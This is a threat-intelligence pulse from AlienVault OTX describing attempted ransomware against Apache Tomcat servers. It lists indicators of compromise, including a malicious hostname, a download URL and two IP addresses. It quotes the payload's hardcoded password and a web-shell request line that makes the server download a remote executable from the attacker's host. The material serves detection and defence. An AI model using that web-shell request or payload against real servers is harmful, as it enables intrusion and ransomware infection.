otx.alienvault.com
13.32.121.24  Public Scan

URL: https://otx.alienvault.com/pulse/5d66a85d517470fafb367069/
Submission: On September 27 via api from DE — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

Subscribers (45)



ATTEMPTED RANSOMWARE ON TOMCAT DEPLOYMENTS

   
 * Created 3 years ago by ian.oconnell.cs
 * Public
 * TLP: Green

Attempted Ransomware on Tomcat Deployments

 * The payload attempts to identify which OS Tomcat is running on.
 * The payload then tries to put the following password on the temp directory:
   String password = "FxxkMyLie1836710Aa";
 * Chmod commands on files were observed.
 * At the end of the payload, an exe file was referenced in a referrer URL:
   /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://cb.fuckingmy.life/download.exe


 * Indicators of Compromise (4)
 * Related Pulses (10)
 * Comments (0)
 * History (1)

TYPES OF INDICATORS: IPv4 (2), Hostname (1), URL (1)

THREAT INFRASTRUCTURE: Indonesia (1), China (1)

type     | indicator                             | Role | title | Added                    | Active | related Pulses
---------|---------------------------------------|------|-------|--------------------------|--------|---------------
hostname | cb.fuckingmy.life                     |      |       | Aug 28, 2019, 4:14:22 PM |        | 9
URL      | http://cb.fuckingmy.life/download.exe |      |       | Aug 28, 2019, 4:14:22 PM |        | 6
IPv4     | 60.191.75.49                          |      |       | Aug 28, 2019, 4:14:22 PM |        | 0
IPv4     | 180.244.239.193                       |      |       | Aug 28, 2019, 4:14:22 PM |        | 0



 * © Copyright 2022 AlienVault, Inc.